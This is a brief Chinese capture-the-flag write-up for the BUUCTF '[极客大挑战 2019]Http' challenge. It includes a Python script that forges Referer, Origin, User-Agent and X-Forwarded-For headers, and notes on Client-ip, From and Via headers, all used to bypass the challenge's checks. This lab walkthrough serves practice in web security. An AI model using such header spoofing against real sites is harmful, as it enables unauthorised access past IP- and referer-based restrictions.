【BUUCTF】[极客大挑战 2019]Http

[TOC]

[极客大挑战 2019]Http

首先在源码中发现Secrect.php

进入页面后发现不同的提示就想到下列操作：

最重要的是X-Forwarded-For: 127.0.0.1修改为本地访问

# -*- coding: UTF-8 -*-
import requests
url="http://node3.buuoj.cn:29354/Secret.php"
headers={
	"Referer": "https://www.Sycsecret.com",
	"Origin":"https://www.Sycsecret.com",
	"User-Agent": "Syclover",
	"X-Forwarded-For": "127.0.0.1"
}
r=requests.get(url=url,headers=headers)
print(r.text)

返回信息变成了需要从本地访问，使用XFF或者Client-ip绕过：

Client-ip: 127.0.0.1

如果添加邮箱：

From: xxx

需要代理，代理服务器地址需要是xxx，添加Via头 (通知中间网关或代理服务器地址，通信协议)

Via: xxx